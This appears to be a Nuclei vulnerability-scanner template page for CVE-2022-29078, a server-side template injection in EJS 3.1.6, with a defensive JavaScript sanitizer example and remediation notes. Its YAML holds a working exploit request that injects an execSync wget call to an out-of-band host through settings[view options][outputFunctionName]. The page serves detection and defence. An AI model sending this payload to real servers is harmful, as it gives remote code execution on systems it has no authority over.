Node.js Embedded JavaScript 3.1.6 - Template Injection
ID: CVE-2022-29078
Severity: critical
Author: For3stCo1d
Tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js
Description
Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
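The mechanism above, as an added example that is not part of the Nuclei template or the EJS project (parseNestedQuery, sanitizeLocals, RESERVED_KEYS and isSafeOutputFunctionName are this example's own names): it shows how a bracketed query key becomes the nested object that EJS 3.1.6 reads as engine options when request data is passed straight into render locals, and a server-side guard that strips such keys and checks outputFunctionName before rendering.

```javascript
// Bracket-notation parser mirroring qs-style nesting (assumption: close enough
// for the demonstration; real Express apps get req.query from qs).
function parseNestedQuery(queryString) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(queryString)) {
    const path = rawKey.replace(/\]/g, '').split('['); // "a[b][c]" -> ["a","b","c"]
    let node = out;
    path.forEach((part, i) => {
      if (i === path.length - 1) { node[part] = value; return; }
      if (node[part] === null || typeof node[part] !== 'object') node[part] = {};
      node = node[part];
    });
  }
  return out;
}

// Keys EJS interprets as engine options; none of them should arrive in a request.
const RESERVED_KEYS = new Set([
  'settings', 'view options', 'outputFunctionName', 'localsName', 'destructuredLocals',
]);

// Returns a copy of `locals` with reserved keys removed at any depth, plus the
// dropped key paths, which are worth logging as an exploitation-attempt signal.
function sanitizeLocals(locals) {
  const dropped = [];
  const walk = (obj, prefix) => {
    const clean = {};
    for (const [key, val] of Object.entries(obj)) {
      const path = prefix ? `${prefix}.${key}` : key;
      if (RESERVED_KEYS.has(key)) { dropped.push(path); continue; }
      clean[key] = (val !== null && typeof val === 'object') ? walk(val, path) : val;
    }
    return clean;
  };
  return { clean: walk(locals, ''), dropped };
}

// Even when set from server config, outputFunctionName must be a bare JS
// identifier: anything else is spliced verbatim into the compiled template.
const JS_IDENTIFIER = /^[A-Za-z_$][A-Za-z0-9_$]*$/;
function isSafeOutputFunctionName(name) {
  return typeof name === 'string' && JS_IDENTIFIER.test(name);
}

// Constructed sample: the shape of the template's probe with an inert value.
const SAMPLE_QUERY = 'id=abc123&settings[view%20options][outputFunctionName]=x;s';
```

Call `sanitizeLocals(parseNestedQuery(req.url.split('?')[1] || ''))` before `res.render()` and log any non-empty `dropped` list; a populated `settings.view options` path is exactly what this template's probe produces.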
YAML Source
id: CVE-2022-29078

info:
  name: Node.js Embedded JavaScript 3.1.6 - Template Injection
  author: For3stCo1d
  severity: critical
  description: |
    Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.
  impact: |
    Remote code execution can lead to unauthorized access, data leakage, and complete system compromise.
  remediation: |
    Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability.
  reference:
    - https://eslam.io/posts/ejs-server-side-template-injection-rce/
    - https://github.com/miko550/CVE-2022-29078
    - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf
    - https://nvd.nist.gov/vuln/detail/CVE-2022-29078
    - https://github.com/mde/ejs/releases
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-29078
    cwe-id: CWE-94
    epss-score: 0.28707
    epss-percentile: 0.96859
    cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: ejs
    product: ejs
    framework: node.js
  tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js

http:
  - raw:
      - |
        GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - http

      - type: word
        part: body
        words:
          - You are viewing page number
# digest: 4b0a00483046022100a0bcaeaf020c1de954ccf83bcaae874f0a5a7b4a7964606fa127cb3a423500e9022100ab7661eb48a24da9b2bc892e23cde0064063414618c4896544d091bc067316a9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template detects the vulnerability in web applications. Run it with the Nuclei tool to scan a target for the request pattern and out-of-band interaction described above.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-29078.yaml"